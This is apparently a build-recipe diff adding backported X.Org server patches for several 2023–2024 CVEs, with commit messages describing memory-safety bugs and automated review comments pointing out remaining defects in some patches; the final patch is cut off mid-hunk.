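+From 9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 14 Dec 2023 11:29:49 +1000
+Subject: [PATCH] dix: allocate enough space for logical button maps
+
+Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for
+each logical button currently down. Since buttons can be arbitrarily mapped
+to anything up to 255 make sure we have enough bits for the maximum mapping.
+
+CVE-2023-6816, ZDI-CAN-22664, ZDI-CAN-22665
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3]
+CVE: CVE-2023-6816
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xiquerypointer.c | 3 +--
+ dix/enterleave.c | 5 +++--
+ 2 files changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/Xi/xiquerypointer.c b/Xi/xiquerypointer.c
+index 5b77b1a444..2b05ac5f39 100644
+--- a/Xi/xiquerypointer.c
++++ b/Xi/xiquerypointer.c
+@@ -149,8 +149,7 @@ ProcXIQueryPointer(ClientPtr client)
+ if (pDev->button) {
+ int i;
+
+- rep.buttons_len =
+- bytes_to_int32(bits_to_bytes(pDev->button->numButtons));
++ rep.buttons_len = bytes_to_int32(bits_to_bytes(256)); /* button map up to 255 */
+ rep.length += rep.buttons_len;
+ buttons = calloc(rep.buttons_len, 4);
+ if (!buttons)
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index 867ec74363..ded8679d76 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -784,8 +784,9 @@ DeviceFocusEvent(DeviceIntPtr dev, int type, int mode, int detail,
+
+ mouse = IsFloating(dev) ? dev : GetMaster(dev, MASTER_POINTER);
+
+- /* XI 2 event */
+- btlen = (mouse->button) ? bits_to_bytes(mouse->button->numButtons) : 0;
++ /* XI 2 event contains the logical button map - maps are CARD8
++ * so we need 256 bits for the possibly maximum mapping */
++ btlen = (mouse->button) ? bits_to_bytes(256) : 0;
+ btlen = bytes_to_int32(btlen);
+ len = sizeof(xXIFocusInEvent) + btlen * 4;
+
+--
+GitLab
+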
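Review bot: The literal `256` now sizes the button mask in both Xi/xiquerypointer.c and dix/enterleave.c, with the reason given only in two differently worded comments, so the two sites can drift apart. A single named constant shared by both (for example `#define MAX_LOGICAL_BUTTONS 256`; the name is only a suggestion) would keep `rep.buttons_len` and `btlen` in step and record that the bound comes from the CARD8 button map rather than from `numButtons`. The loops that set bits in these buffers are outside the hunks, so check that they index by mapped button number and cannot exceed that bound.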
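--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch
@@ -0,0 +1,87 @@
+From ece23be888a93b741aa1209d1dbf64636109d6a5 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 18 Dec 2023 14:27:50 +1000
+Subject: [PATCH] dix: Allocate sufficient xEvents for our DeviceStateNotify
+
+If a device has both a button class and a key class and numButtons is
+zero, we can get an OOB write due to event under-allocation.
+
+This function seems to assume a device has either keys or buttons, not
+both. It has two virtually identical code paths, both of which assume
+they're applying to the first event in the sequence.
+
+A device with both a key and button class triggered a logic bug - only
+one xEvent was allocated but the deviceStateNotify pointer was pushed on
+once per type. So effectively this logic code:
+
+ int count = 1;
+ if (button && nbuttons > 32) count++;
+ if (key && nbuttons > 0) count++;
+ if (key && nkeys > 32) count++; // this is basically always true
+ // count is at 2 for our keys + zero button device
+
+ ev = alloc(count * sizeof(xEvent));
+ FixDeviceStateNotify(ev);
+ if (button)
+ FixDeviceStateNotify(ev++);
+ if (key)
+ FixDeviceStateNotify(ev++); // santa drops into the wrong chimney here
+
+If the device has more than 3 valuators, the OOB is pushed back - we're
+off by one so it will happen when the last deviceValuator event is
+written instead.
+
+Fix this by allocating the maximum number of events we may allocate.
+Note that the current behavior is not protocol-correct anyway, this
+patch fixes only the allocation issue.
+
+Note that this issue does not trigger if the device has at least one
+button. While the server does not prevent a button class with zero
+buttons, it is very unlikely.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/ece23be888a93b741aa1209d1dbf64636109d6a5]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index ded8679d76..17964b00a4 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -675,7 +675,8 @@ static void
+ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ {
+ int evcount = 1;
+- deviceStateNotify *ev, *sev;
++ deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3];
++ deviceStateNotify *ev;
+ deviceKeyStateNotify *kev;
+ deviceButtonStateNotify *bev;
+
+@@ -714,7 +715,7 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ }
+ }
+
+- sev = ev = xallocarray(evcount, sizeof(xEvent));
++ ev = sev;
+ FixDeviceStateNotify(dev, ev, NULL, NULL, NULL, first);
+
+ if (b != NULL) {
+@@ -770,7 +771,6 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+
+ DeliverEventsToWindow(dev, win, (xEvent *) sev, evcount,
+ DeviceStateNotifyMask, NullGrab);
+- free(sev);
+ }
+
+ void
+--
+GitLab
+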
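Review bot: After this change `sev` is a fixed-size stack array, but `evcount` is still computed at run time and nothing in these hunks checks it against the array length before `ev` is advanced through the `FixDeviceStateNotify` calls. The size `6 + (MAX_VALUATORS + 2)/3` is intended as the maximum, yet a guard such as `BUG_RETURN(evcount <= ARRAY_SIZE(sev));` placed right after the count is computed would turn a miscount into a logged bail-out instead of a stack overwrite; that check only arrives in CVE-2024-0229-2.patch, so the two patches need to be applied together. The array is also not zero-initialised, so any slot counted in `evcount` but not written would be delivered with stale stack bytes, which `deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3] = { 0 };` would avoid. The body of DeliverStateNotifyEvent is only partly visible in the hunks.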
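--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch
@@ -0,0 +1,221 @@
+From 219c54b8a3337456ce5270ded6a67bcde53553d5 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 18 Dec 2023 12:26:20 +1000
+Subject: [PATCH] dix: fix DeviceStateNotify event calculation
+
+The previous code only made sense if one considers buttons and keys to
+be mutually exclusive on a device. That is not necessarily true, causing
+a number of issues.
+
+This function allocates and fills in the number of xEvents we need to
+send the device state down the wire. This is split across multiple
+32-byte devices including one deviceStateNotify event and optional
+deviceKeyStateNotify, deviceButtonStateNotify and (possibly multiple)
+deviceValuator events.
+
+The previous behavior would instead compose a sequence
+of [state, buttonstate, state, keystate, valuator...]. This is not
+protocol correct, and on top of that made the code extremely convoluted.
+
+Fix this by streamlining: add both button and key into the deviceStateNotify
+and then append the key state and button state, followed by the
+valuators. Finally, the deviceValuator events contain up to 6 valuators
+per event but we only ever sent through 3 at a time. Let's double that
+troughput.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/219c54b8a3337456ce5270ded6a67bcde53553d5]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.c | 121 ++++++++++++++++++++---------------------------
+ 1 file changed, 52 insertions(+), 69 deletions(-)
+
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index 17964b00a4..7b7ba1098b 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -615,9 +615,15 @@ FixDeviceValuator(DeviceIntPtr dev, deviceValuator * ev, ValuatorClassPtr v,
+
+ ev->type = DeviceValuator;
+ ev->deviceid = dev->id;
+- ev->num_valuators = nval < 3 ? nval : 3;
++ ev->num_valuators = nval < 6 ? nval : 6;
+ ev->first_valuator = first;
+ switch (ev->num_valuators) {
++ case 6:
++ ev->valuator2 = v->axisVal[first + 5];
++ case 5:
++ ev->valuator2 = v->axisVal[first + 4];
++ case 4:
++ ev->valuator2 = v->axisVal[first + 3];
+ case 3:
+ ev->valuator2 = v->axisVal[first + 2];
+ case 2:
+@@ -626,7 +632,6 @@ FixDeviceValuator(DeviceIntPtr dev, deviceValuator * ev, ValuatorClassPtr v,
+ ev->valuator0 = v->axisVal[first];
+ break;
+ }
+- first += ev->num_valuators;
+ }
+
+ static void
+@@ -646,7 +651,7 @@ FixDeviceStateNotify(DeviceIntPtr dev, deviceStateNotify * ev, KeyClassPtr k,
+ ev->num_buttons = b->numButtons;
+ memcpy((char *) ev->buttons, (char *) b->down, 4);
+ }
+- else if (k) {
++ if (k) {
+ ev->classes_reported |= (1 << KeyClass);
+ ev->num_keys = k->xkbInfo->desc->max_key_code -
+ k->xkbInfo->desc->min_key_code;
+@@ -670,15 +675,26 @@ FixDeviceStateNotify(DeviceIntPtr dev, deviceStateNotify * ev, KeyClassPtr k,
+ }
+ }
+
+-
++/**
++ * The device state notify event is split across multiple 32-byte events.
++ * The first one contains the first 32 button state bits, the first 32
++ * key state bits, and the first 3 valuator values.
++ *
++ * If a device has more than that, the server sends out:
++ * - one deviceButtonStateNotify for buttons 32 and above
++ * - one deviceKeyStateNotify for keys 32 and above
++ * - one deviceValuator event per 6 valuators above valuator 4
++ *
++ * All events but the last one have the deviceid binary ORed with MORE_EVENTS,
++ */
+ static void
+ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ {
++ /* deviceStateNotify, deviceKeyStateNotify, deviceButtonStateNotify
++ * and one deviceValuator for each 6 valuators */
++ deviceStateNotify sev[3 + (MAX_VALUATORS + 6)/6];
+ int evcount = 1;
+- deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3];
+- deviceStateNotify *ev;
+- deviceKeyStateNotify *kev;
+- deviceButtonStateNotify *bev;
++ deviceStateNotify *ev = sev;
+
+ KeyClassPtr k;
+ ButtonClassPtr b;
+@@ -691,82 +707,49 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+
+ if ((b = dev->button) != NULL) {
+ nbuttons = b->numButtons;
+- if (nbuttons > 32)
++ if (nbuttons > 32) /* first 32 are encoded in deviceStateNotify */
+ evcount++;
+ }
+ if ((k = dev->key) != NULL) {
+ nkeys = k->xkbInfo->desc->max_key_code - k->xkbInfo->desc->min_key_code;
+- if (nkeys > 32)
++ if (nkeys > 32) /* first 32 are encoded in deviceStateNotify */
+ evcount++;
+- if (nbuttons > 0) {
+- evcount++;
+- }
+ }
+ if ((v = dev->valuator) != NULL) {
+ nval = v->numAxes;
+-
+- if (nval > 3)
+- evcount++;
+- if (nval > 6) {
+- if (!(k && b))
+- evcount++;
+- if (nval > 9)
+- evcount += ((nval - 7) / 3);
+- }
++ /* first three are encoded in deviceStateNotify, then
++ * it's 6 per deviceValuator event */
++ evcount += ((nval - 3) + 6)/6;
+ }
+
+- ev = sev;
+- FixDeviceStateNotify(dev, ev, NULL, NULL, NULL, first);
+-
+- if (b != NULL) {
+- FixDeviceStateNotify(dev, ev++, NULL, b, v, first);
+- first += 3;
+- nval -= 3;
+- if (nbuttons > 32) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- bev = (deviceButtonStateNotify *) ev++;
+- bev->type = DeviceButtonStateNotify;
+- bev->deviceid = dev->id;
+- memcpy((char *) &bev->buttons[4], (char *) &b->down[4],
+- DOWN_LENGTH - 4);
+- }
+- if (nval > 0) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+- first += 3;
+- nval -= 3;
+- }
++ BUG_RETURN(evcount <= ARRAY_SIZE(sev));
++
++ FixDeviceStateNotify(dev, ev, k, b, v, first);
++
++ if (b != NULL && nbuttons > 32) {
++ deviceButtonStateNotify *bev = (deviceButtonStateNotify *) ++ev;
++ (ev - 1)->deviceid |= MORE_EVENTS;
++ bev->type = DeviceButtonStateNotify;
++ bev->deviceid = dev->id;
++ memcpy((char *) &bev->buttons[4], (char *) &b->down[4],
++ DOWN_LENGTH - 4);
+ }
+
+- if (k != NULL) {
+- FixDeviceStateNotify(dev, ev++, k, NULL, v, first);
+- first += 3;
+- nval -= 3;
+- if (nkeys > 32) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- kev = (deviceKeyStateNotify *) ev++;
+- kev->type = DeviceKeyStateNotify;
+- kev->deviceid = dev->id;
+- memmove((char *) &kev->keys[0], (char *) &k->down[4], 28);
+- }
+- if (nval > 0) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+- first += 3;
+- nval -= 3;
+- }
++ if (k != NULL && nkeys > 32) {
++ deviceKeyStateNotify *kev = (deviceKeyStateNotify *) ++ev;
++ (ev - 1)->deviceid |= MORE_EVENTS;
++ kev->type = DeviceKeyStateNotify;
++ kev->deviceid = dev->id;
++ memmove((char *) &kev->keys[0], (char *) &k->down[4], 28);
+ }
+
++ first = 3;
++ nval -= 3;
+ while (nval > 0) {
+- FixDeviceStateNotify(dev, ev++, NULL, NULL, v, first);
+- first += 3;
+- nval -= 3;
+- if (nval > 0) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+- first += 3;
+- nval -= 3;
+- }
++ ev->deviceid |= MORE_EVENTS;
++ FixDeviceValuator(dev, (deviceValuator *) ++ev, v, first);
++ first += 6;
++ nval -= 6;
+ }
+
+ DeliverEventsToWindow(dev, win, (xEvent *) sev, evcount,
+--
+GitLab
+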
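Review bot: In the FixDeviceValuator hunk the three new cases all assign to `ev->valuator2`, so with fall-through only `valuator2` is written (ending up as `axisVal[first + 2]`) and the fields for the fourth to sixth valuator are never set, even though `num_valuators` can now be 6. Because `sev` in DeliverStateNotifyEvent is a stack array with no initialiser, those unset fields would reach the client holding whatever was on the stack. The cases should read `ev->valuator5 = v->axisVal[first + 5];`, `ev->valuator4 = v->axisVal[first + 4];` and `ev->valuator3 = v->axisVal[first + 3];`. Separately, `evcount += ((nval - 3) + 6)/6` appears to count one event too many whenever `nval - 3` is a multiple of 6 (for example `nval == 3`), while the `while (nval > 0)` loop writes nothing for it; `if (nval > 3) evcount += (nval - 3 + 5)/6;` matches what the loop produces.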
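--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch
@@ -0,0 +1,41 @@
+From df3c65706eb169d5938df0052059f3e0d5981b74 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 21 Dec 2023 13:48:10 +1000
+Subject: [PATCH] Xi: when creating a new ButtonClass, set the number of
+ buttons
+
+There's a racy sequence where a master device may copy the button class
+from the slave, without ever initializing numButtons. This leads to a
+device with zero buttons but a button class which is invalid.
+
+Let's copy the numButtons value from the source - by definition if we
+don't have a button class yet we do not have any other slave devices
+with more than this number of buttons anyway.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/df3c65706eb169d5938df0052059f3e0d5981b74]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index 54ea11a938..e161714682 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -605,6 +605,7 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+ to->button = calloc(1, sizeof(ButtonClassRec));
+ if (!to->button)
+ FatalError("[Xi] no memory for class shift.\n");
++ to->button->numButtons = from->button->numButtons;
+ }
+ else
+ classes->button = NULL;
+--
+GitLab
+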
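--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch
@@ -0,0 +1,45 @@
+From 37539cb0bfe4ed96d4499bf371e6b1a474a740fe Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 21 Dec 2023 14:10:11 +1000
+Subject: [PATCH] Xi: require a pointer and keyboard device for
+ XIAttachToMaster
+
+If we remove a master device and specify which other master devices
+attached slaves should be returned to, enforce that those two are
+indeeed a pointer and a keyboard.
+
+Otherwise we can try to attach the keyboards to pointers and vice versa,
+leading to possible crashes later.
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/37539cb0bfe4ed96d4499bf371e6b1a474a740fe]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xichangehierarchy.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
+index 504defe566..d2d985848d 100644
+--- a/Xi/xichangehierarchy.c
++++ b/Xi/xichangehierarchy.c
+@@ -270,7 +270,7 @@ remove_master(ClientPtr client, xXIRemoveMasterInfo * r, int flags[MAXDEVICES])
+ if (rc != Success)
+ goto unwind;
+
+- if (!IsMaster(newptr)) {
++ if (!IsMaster(newptr) || !IsPointerDevice(newptr)) {
+ client->errorValue = r->return_pointer;
+ rc = BadDevice;
+ goto unwind;
+@@ -281,7 +281,7 @@ remove_master(ClientPtr client, xXIRemoveMasterInfo * r, int flags[MAXDEVICES])
+ if (rc != Success)
+ goto unwind;
+
+- if (!IsMaster(newkeybd)) {
++ if (!IsMaster(newkeybd) || !IsKeyboardDevice(newkeybd)) {
+ client->errorValue = r->return_keyboard;
+ rc = BadDevice;
+ goto unwind;
+--
+GitLab
+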
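--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch
@@ -0,0 +1,64 @@
+From e5e8586a12a3ec915673edffa10dc8fe5e15dac3 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Wed, 6 Dec 2023 12:09:41 +0100
+Subject: [PATCH] glx: Call XACE hooks on the GLX buffer
+
+The XSELINUX code will label resources at creation by checking the
+access mode. When the access mode is DixCreateAccess, it will call the
+function to label the new resource SELinuxLabelResource().
+
+However, GLX buffers do not go through the XACE hooks when created,
+hence leaving the resource actually unlabeled.
+
+When, later, the client tries to create another resource using that
+drawable (like a GC for example), the XSELINUX code would try to use
+the security ID of that object which has never been labeled, get a NULL
+pointer and crash when checking whether the requested permissions are
+granted for subject security ID.
+
+To avoid the issue, make sure to call the XACE hooks when creating the
+GLX buffers.
+
+Credit goes to Donn Seeley <donn@xmission.com> for providing the patch.
+
+CVE-2024-0408
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Acked-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/e5e8586a12a3ec915673edffa10dc8fe5e15dac3]
+CVE: CVE-2024-0408
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ glx/glxcmds.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/glx/glxcmds.c b/glx/glxcmds.c
+index fc26a2e345..1e46d0c723 100644
+--- a/glx/glxcmds.c
++++ b/glx/glxcmds.c
+@@ -48,6 +48,7 @@
+ #include "indirect_util.h"
+ #include "protocol-versions.h"
+ #include "glxvndabi.h"
++#include "xace.h"
+
+ static char GLXServerVendorName[] = "SGI";
+
+@@ -1392,6 +1393,13 @@ DoCreatePbuffer(ClientPtr client, int screenNum, XID fbconfigId,
+ if (!pPixmap)
+ return BadAlloc;
+
++ err = XaceHook(XACE_RESOURCE_ACCESS, client, glxDrawableId, RT_PIXMAP,
++ pPixmap, RT_NONE, NULL, DixCreateAccess);
++ if (err != Success) {
++ (*pGlxScreen->pScreen->DestroyPixmap) (pPixmap);
++ return err;
++ }
++
+ /* Assign the pixmap the same id as the pbuffer and add it as a
+ * resource so it and the DRI2 drawable will be reclaimed when the
+ * pbuffer is destroyed. */
+--
+GitLab
+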
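--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch
@@ -0,0 +1,46 @@
+From 2ef0f1116c65d5cb06d7b6d83f8a1aea702c94f7 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Wed, 6 Dec 2023 11:51:56 +0100
+Subject: [PATCH] ephyr,xwayland: Use the proper private key for cursor
+
+The cursor in DIX is actually split in two parts, the cursor itself and
+the cursor bits, each with their own devPrivates.
+
+The cursor itself includes the cursor bits, meaning that the cursor bits
+devPrivates in within structure of the cursor.
+
+Both Xephyr and Xwayland were using the private key for the cursor bits
+to store the data for the cursor, and when using XSELINUX which comes
+with its own special devPrivates, the data stored in that cursor bits'
+devPrivates would interfere with the XSELINUX devPrivates data and the
+SELINUX security ID would point to some other unrelated data, causing a
+crash in the XSELINUX code when trying to (re)use the security ID.
+
+CVE-2024-0409
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Reviewed-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/2ef0f1116c65d5cb06d7b6d83f8a1aea702c94f7]
+CVE: CVE-2024-0409
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/kdrive/ephyr/ephyrcursor.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/kdrive/ephyr/ephyrcursor.c b/hw/kdrive/ephyr/ephyrcursor.c
+index f991899..3f192d0 100644
+--- a/hw/kdrive/ephyr/ephyrcursor.c
++++ b/hw/kdrive/ephyr/ephyrcursor.c
+@@ -246,7 +246,7 @@ miPointerSpriteFuncRec EphyrPointerSpriteFuncs = {
+ Bool
+ ephyrCursorInit(ScreenPtr screen)
+ {
+- if (!dixRegisterPrivateKey(&ephyrCursorPrivateKey, PRIVATE_CURSOR_BITS,
++ if (!dixRegisterPrivateKey(&ephyrCursorPrivateKey, PRIVATE_CURSOR,
+ sizeof(ephyrCursorRec)))
+ return FALSE;
+
+--
+2.25.1
+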
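Review bot: The patch header still describes a fix for both Xephyr and Xwayland ("ephyr,xwayland: Use the proper private key for cursor"), but the diffstat and the only hunk touch hw/kdrive/ephyr/ephyrcursor.c alone. If the Xwayland half was dropped on purpose for this backport, say so next to the `Upstream-Status` line, for example `Backport: xwayland hunk dropped, <reason>`, so that someone auditing CVE-2024-0409 coverage does not assume both servers are fixed by this file. If it was dropped by accident, the Xwayland cursor code would presumably still register its private under `PRIVATE_CURSOR_BITS`; that file is not visible here, so check it in the recipe's source tree.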
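--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch
@@ -0,0 +1,113 @@
+From 4a5e9b1895627d40d26045bd0b7ef3dce503cbd1 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 4 Jan 2024 10:01:24 +1000
+Subject: [PATCH] Xi: flush hierarchy events after adding/removing master
+ devices
+
+The `XISendDeviceHierarchyEvent()` function allocates space to store up
+to `MAXDEVICES` (256) `xXIHierarchyInfo` structures in `info`.
+
+If a device with a given ID was removed and a new device with the same
+ID added both in the same operation, the single device ID will lead to
+two info structures being written to `info`.
+
+Since this case can occur for every device ID at once, a total of two
+times `MAXDEVICES` info structures might be written to the allocation.
+
+To avoid it, once one add/remove master is processed, send out the
+device hierarchy event for the current state and continue. That event
+thus only ever has exactly one of either added/removed in it (and
+optionally slave attached/detached).
+
+CVE-2024-21885, ZDI-CAN-22744
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/4a5e9b1895627d40d26045bd0b7ef3dce503cbd1]
+CVE: CVE-2024-21885
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xichangehierarchy.c | 27 ++++++++++++++++++++++-----
+ 1 file changed, 22 insertions(+), 5 deletions(-)
+
+diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
+index d2d985848d..72d00451e3 100644
+--- a/Xi/xichangehierarchy.c
++++ b/Xi/xichangehierarchy.c
+@@ -416,6 +416,11 @@ ProcXIChangeHierarchy(ClientPtr client)
+ size_t len; /* length of data remaining in request */
+ int rc = Success;
+ int flags[MAXDEVICES] = { 0 };
++ enum {
++ NO_CHANGE,
++ FLUSH,
++ CHANGED,
++ } changes = NO_CHANGE;
+
+ REQUEST(xXIChangeHierarchyReq);
+ REQUEST_AT_LEAST_SIZE(xXIChangeHierarchyReq);
+@@ -465,8 +470,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = add_master(client, c, flags);
+ if (rc != Success)
+ goto unwind;
+- }
++ changes = FLUSH;
+ break;
++ }
+ case XIRemoveMaster:
+ {
+ xXIRemoveMasterInfo *r = (xXIRemoveMasterInfo *) any;
+@@ -475,8 +481,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = remove_master(client, r, flags);
+ if (rc != Success)
+ goto unwind;
+- }
++ changes = FLUSH;
+ break;
++ }
+ case XIDetachSlave:
+ {
+ xXIDetachSlaveInfo *c = (xXIDetachSlaveInfo *) any;
+@@ -485,8 +492,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = detach_slave(client, c, flags);
+ if (rc != Success)
+ goto unwind;
+- }
++ changes = CHANGED;
+ break;
++ }
+ case XIAttachSlave:
+ {
+ xXIAttachSlaveInfo *c = (xXIAttachSlaveInfo *) any;
+@@ -495,16 +503,25 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = attach_slave(client, c, flags);
+ if (rc != Success)
+ goto unwind;
++ changes = CHANGED;
++ break;
+ }
++ default:
+ break;
+ }
+
++ if (changes == FLUSH) {
++ XISendDeviceHierarchyEvent(flags);
++ memset(flags, 0, sizeof(flags));
++ changes = NO_CHANGE;
++ }
++
+ len -= any->length * 4;
+ any = (xXIAnyHierarchyChangeInfo *) ((char *) any + any->length * 4);
+ }
+
+ unwind:
+-
+- XISendDeviceHierarchyEvent(flags);
++ if (changes != NO_CHANGE)
++ XISendDeviceHierarchyEvent(flags);
+ return rc;
+ }
+--
+GitLab
+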
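Review bot: The three-state `changes` enum added at the top of ProcXIChangeHierarchy carries the whole fix but has no comment, so the difference between `FLUSH` and `CHANGED` can only be recovered from the commit message. A comment above the enum would help whoever next rebases this backport, for example `/* FLUSH: a master was added or removed, send the hierarchy event now so one device ID never yields two info entries; CHANGED: slave attach/detach, may be batched until unwind */`. It is also worth confirming against the parts of the function outside these hunks that a failing add_master() or remove_master() leaves `flags` untouched, because the `unwind:` path now skips the event when `changes == NO_CHANGE`. Any wording change belongs upstream first, since this file is a verbatim backport.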
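--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch
@@ -0,0 +1,74 @@
+From bc1fdbe46559dd947674375946bbef54dd0ce36b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Jos=C3=A9=20Exp=C3=B3sito?= <jexposit@redhat.com>
+Date: Fri, 22 Dec 2023 18:28:31 +0100
+Subject: [PATCH] Xi: do not keep linked list pointer during recursion
+
+The `DisableDevice()` function is called whenever an enabled device
+is disabled and it moves the device from the `inputInfo.devices` linked
+list to the `inputInfo.off_devices` linked list.
+
+However, its link/unlink operation has an issue during the recursive
+call to `DisableDevice()` due to the `prev` pointer pointing to a
+removed device.
+
+This issue leads to a length mismatch between the total number of
+devices and the number of device in the list, leading to a heap
+overflow and, possibly, to local privilege escalation.
+
+Simplify the code that checked whether the device passed to
+`DisableDevice()` was in `inputInfo.devices` or not and find the
+previous device after the recursion.
+
+CVE-2024-21886, ZDI-CAN-22840
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/bc1fdbe46559dd947674375946bbef54dd0ce36b]
+CVE: CVE-2024-21886
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/devices.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/dix/devices.c b/dix/devices.c
+index dca98c8d1b..389d28a23c 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -453,14 +453,20 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ {
+ DeviceIntPtr *prev, other;
+ BOOL enabled;
++ BOOL dev_in_devices_list = FALSE;
+ int flags[MAXDEVICES] = { 0 };
+
+ if (!dev->enabled)
+ return TRUE;
+
+- for (prev = &inputInfo.devices;
+- *prev && (*prev != dev); prev = &(*prev)->next);
+- if (*prev != dev)
++ for (other = inputInfo.devices; other; other = other->next) {
++ if (other == dev) {
++ dev_in_devices_list = TRUE;
++ break;
++ }
++ }
++
++ if (!dev_in_devices_list)
+ return FALSE;
+
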